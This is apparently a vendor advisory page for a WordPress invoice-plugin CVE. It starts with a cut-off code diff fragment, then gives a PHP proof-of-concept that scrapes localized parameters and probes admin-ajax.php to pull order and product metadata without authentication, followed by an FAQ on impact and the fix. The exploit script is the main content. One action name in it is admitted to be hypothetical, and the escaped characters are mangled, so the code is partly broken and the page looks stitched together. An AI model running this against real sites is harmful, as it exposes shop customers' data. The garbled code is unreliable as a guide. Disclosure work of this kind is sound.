-											if(strpos($item_css_class, 'wt_pklist_printnode_manual_print') === false){
-												$confirmation_clss='wf_pklist_confirm_'.$action;
-												$onclick='onclick=" return wf_Confirm_Notice_for_Manually_Creating_Invoicenumbers(''.$url.'',''.$is_show_prompt.'');"';
+										$tooltip          = ( isset( $btnvv['tooltip'] ) ? $btnvv['tooltip'] : $label );
+										$is_show_prompt   = $btnvv['is_show_prompt'];
+										// Only invoice / proforma actions burn a sequence number on auto-draft.
+										if ( self::is_order_unsaved( $order ) && self::action_bu

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49056 - WebToffee WooCommerce PDF Invoices <= 4.9.4 - Unauthenticated Information Exposure

$target_url = 'http://example.com'; // Replace with the target WordPress site URL

// Step 1: Access the admin script URL to extract localized parameters (wf_pklist_params)
$admin_script_url = $target_url . '/wp-content/plugins/print-invoices-packing-slip-labels-for-woocommerce/admin/js/wf-woocommerce-packing-list-admin.js';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_script_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[*] Requesting admin JS: $admin_script_urln";
echo "[+] HTTP Status: $http_coden";

if ($http_code == 200) {
    // The JavaScript file itself does not contain the localized data; it is embedded in the HTML page via wp_localize_script.
    // We need to fetch a page where the script is enqueued (e.g., a WooCommerce order page for a logged-in user, but for unauthenticated, try a shop or cart page).
    echo "[*] JS file accessible. Localized data is embedded in the HTML page. Fetching front-end page...n";
    
    // Step 2: Fetch a front-end page that likely enqueues the plugin's script
    $page_url = $target_url . '/shop/';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $page_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $html = curl_exec($ch);
    curl_close($ch);
    
    // Look for the wp_localize_script output: var wf_pklist_params = {...}
    preg_match('/var wf_pklist_paramss*=s*({.*?});/s', $html, $matches);
    if (isset($matches[1])) {
        echo "[+] Found wf_pklist_params object:n";
        echo $matches[1] . "nn";
        
        $params = json_decode($matches[1], true);
        if ($params) {
            echo "[+] Decoded parameters:n";
            print_r($params);
            
            // Check for sensitive fields
            if (isset($params['order_meta_autocomplete'])) {
                echo "n[!] Order meta autocomplete data exposed:n";
                print_r(json_decode($params['order_meta_autocomplete'], true));
            }
            if (isset($params['product_meta_autocomplete'])) {
                echo "n[!] Product meta autocomplete data exposed:n";
                print_r(json_decode($params['product_meta_autocomplete'], true));
            }
            if (isset($params['wt_plugin_data'])) {
                echo "n[!] Plugin data exposed:n";
                print_r($params['wt_plugin_data']);
            }
        }
    } else {
        echo "[-] Could not find wf_pklist_params in the page HTML. The script may not be enqueued on this page.n";
        echo "[*] Trying to access admin-ajax.php directly with a common action...n";
        
        // Step 3: Try to call an AJAX action that might leak data without auth
        $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
        $data = array(
            'action' => 'wf_pklist_order_meta_autocomplete', // Hypothetical action name, adjust based on actual plugin
            'term' => 'test'
        );
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $ajax_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        echo "[+] AJAX response (HTTP $http_code): $responsen";
    }
} else {
    echo "[-] Failed to access admin JS. The plugin might not be installed or path differs.n";
}

echo "n[*] Note: This PoC demonstrates unauthenticated access. Actual sensitive data extraction depends on the exact AJAX actions implemented in the plugin.n";

Frequently Asked Questions

What is CVE-2026-49056?
Overview of the vulnerability
CVE-2026-49056 is a security vulnerability in the WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes & Shipping Labels plugin for WordPress. It allows unauthenticated attackers to access sensitive user and configuration information due to improper access controls.
How does CVE-2026-49056 work?
Mechanism of exploitation
The vulnerability arises from the exposure of sensitive data through JavaScript localization and AJAX handlers without proper access checks. Attackers can exploit this by sending crafted requests to the WordPress AJAX endpoint, retrieving sensitive data such as order metadata and user information.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WebToffee WooCommerce PDF Invoices plugin version 4.9.4 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the WebToffee WooCommerce PDF Invoices plugin. If the version is 4.9.4 or earlier, your site is at risk.
What should I do to fix this vulnerability?
Steps for remediation
To remediate CVE-2026-49056, update the WebToffee WooCommerce PDF Invoices plugin to version 4.9.5 or later. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 5.3 indicate?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while exploitation is possible, it may require some level of skill or specific conditions, but it poses a significant risk if left unaddressed.
What kind of data can be exposed due to this vulnerability?
Potential data exposure
Exploitation of this vulnerability can lead to the exposure of sensitive user data such as personal information in order metadata, WooCommerce product details, and internal configuration settings. This could facilitate further attacks or privacy violations.
How does the proof of concept demonstrate the issue?
Explaining the PoC
The proof of concept shows how an attacker can access the vulnerable JavaScript file to extract sensitive localized parameters. By making an HTTP request to the admin script URL, the attacker can retrieve data that should be protected, illustrating the vulnerability’s impact.
Are there any specific configurations that might mitigate this vulnerability?
Possible mitigations
While the best mitigation is to update the plugin, administrators can also restrict access to the WordPress admin area and monitor AJAX requests for unusual activity to reduce the risk of exploitation.
What are the implications of not addressing this vulnerability?
Consequences of inaction
Failing to address CVE-2026-49056 can lead to unauthorized access to sensitive information, which may result in data breaches, privacy violations, or further exploitation of the site. It is crucial to maintain plugin security to protect user data.
Is it safe to use the plugin after updating?
Post-update considerations
After updating to version 4.9.5 or later, the vulnerability should be resolved. However, it is important to regularly monitor for new vulnerabilities and keep all plugins and themes updated to maintain site security.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information about CVE-2026-49056, you can refer to the National Vulnerability Database (NVD) or the official WordPress plugin repository where the vulnerability is documented.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations